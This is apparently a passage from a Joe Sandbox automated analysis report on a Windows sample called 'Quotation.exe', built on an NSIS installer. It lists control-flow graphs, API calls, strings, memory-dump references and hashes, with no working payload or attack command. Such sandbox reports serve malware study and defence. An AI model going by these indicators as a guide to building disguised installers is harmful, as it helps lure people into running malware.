401399 244->246 245->167 247 405383 245->247 246->165 252 40542e-405441 ShowWindow call 4054c6 246->252 247->165 254 405446 252->254 254->191
                                                                                              APIs
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404FAF
                                                                                              • ShowWindow.USER32(?), ref: 00404FD9
                                                                                              • GetWindowLongW.USER32(?,?), ref: 00404FEA
                                                                                              • ShowWindow.USER32(?,?), ref: 00405006
                                                                                              • GetDlgItem.USER32(?,00000001), ref: 0040512D
                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00405137
                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00405151
                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040519F
                                                                                              • GetDlgItem.USER32(?,00000003), ref: 0040524E
                                                                                              • ShowWindow.USER32(00000000,?), ref: 00405277
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040528B
                                                                                              • KiUserCallbackDispatcher.NTDLL(?), ref: 0040529F
                                                                                              • EnableWindow.USER32(?), ref: 004052B7
                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004052CE
                                                                                              • EnableMenuItem.USER32(00000000), ref: 004052D5
                                                                                              • SendMessageW.USER32(?,?,00000000,00000001), ref: 004052E6
                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004052FD
                                                                                              • lstrlenW.KERNEL32(Eget Setup: Installing,?,Eget Setup: Installing,00000000), ref: 0040532E
                                                                                                • Part of subcall function 00405E98: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll,?,?,?), ref: 0040604E
                                                                                              • SetWindowTextW.USER32(?,Eget Setup: Installing), ref: 00405346
                                                                                                • Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                                                                                                • Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                                                                              • DestroyWindow.USER32(?,00000000), ref: 0040538E
                                                                                              • CreateDialogParamW.USER32(?,?,-007A8560), ref: 004053C2
                                                                                                • Part of subcall function 004054F8: SetDlgItemTextW.USER32(?,?,00000000), ref: 00405512
                                                                                              • GetDlgItem.USER32(?,000003FA), ref: 004053EB
                                                                                              • GetWindowRect.USER32(00000000), ref: 004053F2
                                                                                              • ScreenToClient.USER32(?,?), ref: 004053FE
                                                                                              • SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 00405417
                                                                                              • ShowWindow.USER32(?,?,00000000), ref: 00405436
                                                                                                • Part of subcall function 004054C6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8
                                                                                              • ShowWindow.USER32(?,0000000A), ref: 0040547C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuTextUser$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
                                                                                              • String ID: Eget Setup: Installing
                                                                                              • API String ID: 162979904-3699597151
                                                                                              • Opcode ID: 72123b1cd148b1eb205aab3943036d4082e425be0be4f9ae0839b9c0fe245c6a
                                                                                              • Instruction ID: 456415ec42eff5e8f6a9a9f0208e2dc106d0a6226250255d67da48920511729f
                                                                                              • Opcode Fuzzy Hash: 72123b1cd148b1eb205aab3943036d4082e425be0be4f9ae0839b9c0fe245c6a
                                                                                              • Instruction Fuzzy Hash: 38D1C071904B10ABDB20AF21EE44A6B7B68FB89355F00853EF545B21E1CA3D8851CFAD

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 255 405a1c-405a37 call 4068c4 258 405a39-405a49 call 4065fd 255->258 259 405a4b-405a81 call 406955 255->259 267 405aa4-405acd call 40595d call 406616 258->267 263 405a83-405a94 call 406955 259->263 264 405a99-405a9f lstrcatW 259->264 263->264 264->267 273 405ad3-405ad8 267->273 274 405b65-405b6d call 406616 267->274 273->274 275 405ade-405af9 call 406955 273->275 279 405b7b-405ba9 LoadImageW 274->279 280 405b6f-405b76 call 405e98 274->280 281 405afe-405b07 275->281 283 405c28-405c30 call 401533 279->283 284 405bab-405bd6 RegisterClassW 279->284 280->279 281->274 285 405b09-405b0f 281->285 298 405ce2-405ce4 283->298 299 405c36-405c41 call 40595d 283->299 288 405bd8-405bda 284->288 289 405bdf-405c23 SystemParametersInfoW CreateWindowExW 284->289 286 405b11-405b1f call 4065d4 285->286 287 405b22-405b30 lstrlenW 285->287 286->287 292 405b32-405b40 lstrcmpiW 287->292 293 405b58-405b60 call 406534 call 406af8 287->293 294 405ce5-405cec 288->294 289->283 292->293 297 405b42-405b4c GetFileAttributesW 292->297 293->274 301 405b52-405b53 call 406cee 297->301 302 405b4e-405b50 297->302 298->294 308 405c47-405c61 ShowWindow call 40617c 299->308 309 405cc9-405cd1 call 405842 299->309 301->293 302->293 302->301 316 405c63-405c68 call 40617c 308->316 317 405c6d-405c7e GetClassInfoW 308->317 314 405cd3-405cd9 309->314 315 405ced-405cef call 401533 309->315 314->298 322 405cdb-405cdd call 401533 314->322 323 405cf4 315->323 316->317 320 405c80-405c94 GetClassInfoW RegisterClassW 317->320 321 405c96-405cb9 DialogBoxParamW call 401533 317->321 320->321 326 405cbe-405cc7 call 403cd6 321->326 322->298 323->323 326->294
                                                                                              APIs
                                                                                                • Part of subcall function 004068C4: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
                                                                                                • Part of subcall function 004068C4: GetProcAddress.KERNEL32(00000000), ref: 004068EE
                                                                                              • lstrcatW.KERNEL32(1033,Eget Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Eget Setup: Installing,00000000,00000002,00000000,771B3420,00000000,771B3170), ref: 00405A9F
                                                                                              • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\overlays\besvangredes,1033,Eget Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Eget Setup: Installing,00000000,00000002,00000000), ref: 00405B23
                                                                                              • lstrcmpiW.KERNEL32(-000000FC,.exe,Call,?,?,?,Call,00000000,C:\Users\user\overlays\besvangredes,1033,Eget Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Eget Setup: Installing,00000000), ref: 00405B38
                                                                                              • GetFileAttributesW.KERNEL32(Call), ref: 00405B43
                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\overlays\besvangredes), ref: 00405B8C
                                                                                                • Part of subcall function 004065FD: wsprintfW.USER32 ref: 0040660A
                                                                                              • RegisterClassW.USER32(007A74E0), ref: 00405BD1
                                                                                              • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00405BE8
                                                                                              • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405C1D
                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00405C4F
                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,007A74E0), ref: 00405C7A
                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,007A74E0), ref: 00405C87
                                                                                              • RegisterClassW.USER32(007A74E0), ref: 00405C94
                                                                                              • DialogBoxParamW.USER32(?,00000000,00404F70,00000000), ref: 00405CAF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                              • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\overlays\besvangredes$Call$Control Panel\Desktop\ResourceLocale$Eget Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$tz
                                                                                              • API String ID: 1975747703-2171652948
                                                                                              • Opcode ID: d8277d97e2f230740c86ea31856198af6673e632619b6bda425b05bf07e2b6f7
                                                                                              • Instruction ID: 09b92c81f8f4ef2e2e9fd8d830fcc712f1cdd6db1c368b512ccdb95b409c048d
                                                                                              • Opcode Fuzzy Hash: d8277d97e2f230740c86ea31856198af6673e632619b6bda425b05bf07e2b6f7
                                                                                              • Instruction Fuzzy Hash: 31611370604604BEE7107B65AD42F2B366CEB46748F11813EF941B61E2EB3CA9108FAD

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 329 40154a-4015bd 330 402ea1 329->330 331 4015c3-4015c7 329->331 332 402ea5 330->332 333 4016c1-4016cf 331->333 334 4017c2-401e9e call 40303e call 4065ad 331->334 335 401684-4016aa 331->335 336 4015e6-4015ee 331->336 337 4018cb-4018d4 call 40303e call 406a34 331->337 338 40160c-40160d 331->338 339 4015ce-4015d0 331->339 340 4016ef-4016fb call 40303e SetFileAttributesW 331->340 341 4016af-4016bc call 4065fd 331->341 342 40182f-40184b call 40303e GetFullPathNameW 331->342 343 401711-401728 call 40303e call 406ba3 331->343 344 401633-40163a SetForegroundWindow 331->344 345 4017d3-4017f6 call 40303e * 3 MoveFileW 331->345 346 4015d5-4015d6 331->346 347 401618-40162e call 403002 Sleep 331->347 348 4015f9-401607 call 4030fd call 401399 331->348 349 40189b-4018b8 call 40303e SearchPathW 331->349 350 4018de-401904 call 40303e call 406de1 331->350 351 40163f-401645 331->351 366 402eab 332->366 370 4016d1-4016d5 ShowWindow 333->370 371 4016d9-4016e0 333->371 422 401bb2-401bb6 334->422 423 401ea4-401ea8 334->423 367 402ead-402eb7 335->367 353 4015f0-4015f7 PostQuitMessage 336->353 354 4015dc-4015e1 336->354 406 4018d9 337->406 359 40160e-401613 call 405d18 338->359 339->367 389 401701-401703 340->389 341->330 399 401857-40185d 342->399 400 40184d-401855 342->400 414 401784-40178e 343->414 415 40172a-40173f call 4065d4 343->415 344->330 431 401804-401808 345->431 432 4017f8-4017ff 345->432 372 4015d7 call 405d18 346->372 347->330 348->367 349->330 393 4018be-4018c6 349->393 417 401906-40190c call 406af8 350->417 418 40190e-401920 call 406af8 call 406534 lstrcatW 350->418 364 401671-40167f 351->364 365 401647 351->365 353->354 354->367 359->330 364->330 384 401657-40166c call 403002 365->384 385 401649-401650 365->385 366->367 370->371 371->330 388 4016e6-4016ea ShowWindow 371->388 372->354 384->330 385->384 388->330 389->330 401 401709-40170c 389->401 393->332 410 40187b 399->410 411 40185f-401862 399->411 409 40187f-401883 400->409 401->332 406->389 409->332 412 401889-401896 GetShortPathNameW 409->412 410->409 411->410 419 401864-40186c call 4065ad 411->419 412->332 426 401790-4017ab call 405d18 call 406af8 SetCurrentDirectoryW 414->426 427 4017bb-4017bd 414->427 437 401741-401745 415->437 438 401758-401759 call 405dfc 415->438 440 401925-40192d call 406d1b 417->440 418->440 419->400 436 40186e-401876 call 406af8 419->436 422->367 423->367 426->330 455 4017b1-4017b6 426->455 427->359 431->401 439 40180e-401816 call 4065ad 431->439 432->359 436->410 437->438 445 401747-40174e call 4064da 437->445 453 40175e-401760 438->453 439->401 457 40181c-40182a call 40621b 439->457 460 40192e-401931 440->460 445->438 463 401750-401751 call 405e1c 445->463 458 401762-401767 453->458 459 401775-40177e 453->459 455->330 457->359 465 401774 458->465 466 401769-401772 GetFileAttributesW 458->466 459->415 467 401780 459->467 461 401933-40193d call 4065ad 460->461 462 401964-401966 460->462 477 401950-401960 461->477 478 40193f-40194e CompareFileTime 461->478 469 401968-401969 call 406b7b 462->469 470 40196e-401989 call 4068f9 462->470 476 401756 463->476 465->459 466->459 466->465 467->414 469->470 480 401a18-401a49 call 405d18 call 403148 470->480 481 40198f-401991 470->481 476->453 477->462 478->477 493 401a52-401a5a SetFileTime 480->493 494 401a4b-401a50 480->494 482 401993-4019df call 406af8 * 2 call 405e98 call 406af8 call 406a86 481->482 483 4019fd-401a13 call 405d18 481->483 482->460 512 4019e5-4019e8 482->512 483->332 496 401a60-401a6d CloseHandle 493->496 494->493 494->496 496->330 498 401a73-401a76 496->498 500 401a78-401a87 call 405e98 lstrcatW 498->500 501 401a89-401a8c call 405e98 498->501 507 401a91-401a9c call 406a86 500->507 501->507 507->354 513 4019f2-4019f8 512->513 514 4019ea-4019ed 512->514 513->366 514->372
                                                                                              APIs
                                                                                              • PostQuitMessage.USER32(00000000), ref: 004015F1
                                                                                              • Sleep.KERNELBASE(00000001,?,00000000,00000000), ref: 00401628
                                                                                              • SetForegroundWindow.USER32 ref: 00401634
                                                                                              • ShowWindow.USER32(?,00000000,?,?,00000000,00000000), ref: 004016D3
                                                                                              • ShowWindow.USER32(?,?,?,?,00000000,00000000), ref: 004016E8
                                                                                              • SetFileAttributesW.KERNELBASE(00000000,?,?,?,?,00000000,00000000), ref: 004016FB
                                                                                              • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,?,00000000,00000000), ref: 0040176A
                                                                                              • SetCurrentDirectoryW.KERNELBASE(00000000,C:\Users\user\overlays\besvangredes,00000000,000000E6,C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll,00000000,?,?,?,00000000,00000000), ref: 004017A3
                                                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 004017EE
                                                                                              • GetFullPathNameW.KERNEL32(00000000,00000400,00000000,?,00000000,000000E3,C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll,?,?,00000000,00000000), ref: 00401843
                                                                                              • GetShortPathNameW.KERNEL32(00000000,00000000,00000400), ref: 00401890
                                                                                              • SearchPathW.KERNEL32(00000000,00000000,00000000,00000400,00000000,?,000000FF,?,?,00000000,00000000), ref: 004018B0
                                                                                              • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\overlays\besvangredes,00000000,00000000,00000031,00000000,00000000,000000EF,?,?,00000000,00000000), ref: 00401920
                                                                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\overlays\besvangredes,00000000,00000000,00000031,00000000,00000000,000000EF), ref: 00401948
                                                                                              • SetFileTime.KERNELBASE(?,?,00000000,?,?,?,00000000,00000000,000000EA,?,Call,40000000,00000001,Call,00000000,00000000), ref: 00401A5A
                                                                                              • CloseHandle.KERNELBASE(?,?,?,00000000,00000000), ref: 00401A61
                                                                                              • lstrcatW.KERNEL32(Call,?,Call,000000E9,?,?,00000000,00000000), ref: 00401A82
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$PathWindow$AttributesNameShowTimelstrcat$CloseCompareCurrentDirectoryForegroundFullHandleMessageMovePostQuitSearchShortSleep
                                                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp$C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll$C:\Users\user\overlays\besvangredes$Call
                                                                                              • API String ID: 3895412863-3603872608
                                                                                              • Opcode ID: 907391b652bc81e351481e76b091bf194ed4adcc93ce6230dc48087d29c5e171
                                                                                              • Instruction ID: f97e61f8377ab9e25a0dd965f2557d34b91b3991d6c9f65f1b163fc05bb86adc
                                                                                              • Opcode Fuzzy Hash: 907391b652bc81e351481e76b091bf194ed4adcc93ce6230dc48087d29c5e171
                                                                                              • Instruction Fuzzy Hash: 6AD1D571644301ABC710BF66CD85E2B76A8AF86758F10463FF452B22E1DB7CD8019A6F

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 515 4033cb-403418 GetTickCount GetModuleFileNameW call 4068f9 518 403424-403454 call 406af8 call 406cee call 406af8 GetFileSize 515->518 519 40341a-40341f 515->519 527 403550-40355f call 403367 518->527 528 40345a 518->528 520 403623-40362a 519->520 533 403565-403567 527->533 534 40361e 527->534 530 40345e-403484 call 40311b 528->530 538 403616-40361d call 403367 530->538 539 40348a-403491 530->539 536 403598-4035c8 GlobalAlloc call 403131 call 403148 533->536 537 403569-403581 call 403131 call 406926 533->537 534->520 536->534 565 4035ca-4035dc 536->565 557 403586-403588 537->557 538->534 543 403512-403515 539->543 544 403493-4034ac call 406692 539->544 546 403517-40351e call 403367 543->546 547 40351f-403525 543->547 544->547 561 4034ae-4034b6 544->561 546->547 553 403527-403536 call 406e1a 547->553 554 40353a-403542 547->554 553->554 554->530 562 403548-40354c 554->562 557->534 563 40358e-403592 557->563 561->547 566 4034b8-4034c0 561->566 562->527 563->534 563->536 567 4035e4-4035e7 565->567 568 4035de 565->568 566->547 569 4034c2-4034ca 566->569 571 4035ea-4035f2 567->571 568->567 569->547 570 4034cc-4034d4 569->570 570->547 572 4034d6-4034f5 570->572 571->571 573 4035f4-40360d SetFilePointer call 406692 571->573 572->534 574 4034fb-403501 572->574 577 403612-403614 573->577 574->562 576 403503-40350c 574->576 576->547 578 40350e-403510 576->578 577->520 578->547
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 004033DE
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Quotation.exe,00000400), ref: 004033FA
                                                                                                • Part of subcall function 004068F9: GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 004068FD
                                                                                                • Part of subcall function 004068F9: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000), ref: 0040691D
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Quotation.exe,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 00403444
                                                                                              • GlobalAlloc.KERNELBASE(?,?), ref: 0040359E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                              • String ID: C:\Users\user\Desktop$C:\Users\user\Desktop\Quotation.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                              • API String ID: 2803837635-543339705
                                                                                              • Opcode ID: 89db09ba3d9e86f9c075612005f46009679623d63feb2a5cce1b372a96914bed
                                                                                              • Instruction ID: 8295773d5102a3db2c924d587f32f5b95c2827ef7f93a52122a4f4d2b553c90e
                                                                                              • Opcode Fuzzy Hash: 89db09ba3d9e86f9c075612005f46009679623d63feb2a5cce1b372a96914bed
                                                                                              • Instruction Fuzzy Hash: B951D371904300AFD720AF25DD81B1B7AA8BB8471AF10453FF955B62E1CB3D8E548B6E

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 579 405e98-405ea1 580 405ea3-405eb2 579->580 581 405eb4-405ecf 579->581 580->581 582 405ed1-405edc 581->582 583 405ee6-405eed 581->583 582->583 584 405ede-405ee2 582->584 585 4060e1-4060e8 583->585 586 405ef3-405ef6 583->586 584->583 588 4060f3 585->588 589 4060ea-4060f1 call 406af8 585->589 587 405ef7-405f05 586->587 590 405f0b-405f16 587->590 591 4060dc-4060e0 587->591 593 4060f5-4060fb 588->593 589->593 594 4060b5 590->594 595 405f1c-405f60 590->595 591->585 597 4060c3 594->597 598 4060b7-4060c1 594->598 599 406060-406063 595->599 600 405f66-405f77 595->600 601 4060c6 597->601 598->601 602 406065-406068 599->602 603 406099-40609c 599->603 604 405fb7-405fba 600->604 605 405f79-405f97 call 406955 600->605 608 4060c8-4060d6 601->608 606 406078-40608f call 406af8 602->606 607 40606a-406076 call 4065fd 602->607 610 4060a7-4060b3 lstrlenW 603->610 611 40609e-4060a2 call 405e98 603->611 612 405fca-405fcd 604->612 613 405fbc-405fc8 GetSystemDirectoryW 604->613 619 405f9c-405fa5 605->619 606->610 629 406091-406097 call 406d1b 606->629 607->610 608->587 608->591 610->608 611->610 615 405fdd-405fe5 612->615 616 405fcf-405fdb GetWindowsDirectoryW 612->616 614 406038 613->614 625 40603c-406041 614->625 621 405fe7-405ff0 615->621 622 405ffc-406012 SHGetSpecialFolderLocation 615->622 616->614 619->625 626 405fab-405fb2 call 405e98 619->626 633 405ff8-405ffa 621->633 627 406014-40602d SHGetPathFromIDListW CoTaskMemFree 622->627 628 40602f-406036 622->628 630 406043-406046 625->630 631 406054-40605e call 406d1b 625->631 626->625 627->614 627->628 628->614 628->615 629->610 630->631 635 406048-40604e lstrcatW 630->635 631->610 633->614 633->622 635->631
                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00405FC2
                                                                                                • Part of subcall function 00406AF8: lstrcpynW.KERNEL32(?,?,00000400,0040384F,007A7540,NSIS Error), ref: 00406B05
                                                                                                • Part of subcall function 00406D1B: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,00403C8F,C:\Users\user~1\AppData\Local\Temp\,771B3420,004039A0), ref: 00406D90
                                                                                                • Part of subcall function 00406D1B: CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
                                                                                                • Part of subcall function 00406D1B: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,00403C8F,C:\Users\user~1\AppData\Local\Temp\,771B3420,004039A0), ref: 00406DA4
                                                                                                • Part of subcall function 00406D1B: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,00403C8F,C:\Users\user~1\AppData\Local\Temp\,771B3420,004039A0), ref: 00406DBC
                                                                                              • GetWindowsDirectoryW.KERNEL32(Call,00000400,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll,?,?,?), ref: 00405FD5
                                                                                              • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll,?,?,?), ref: 0040604E
                                                                                              • lstrlenW.KERNEL32(Call,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll,?,?,?), ref: 004060A8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
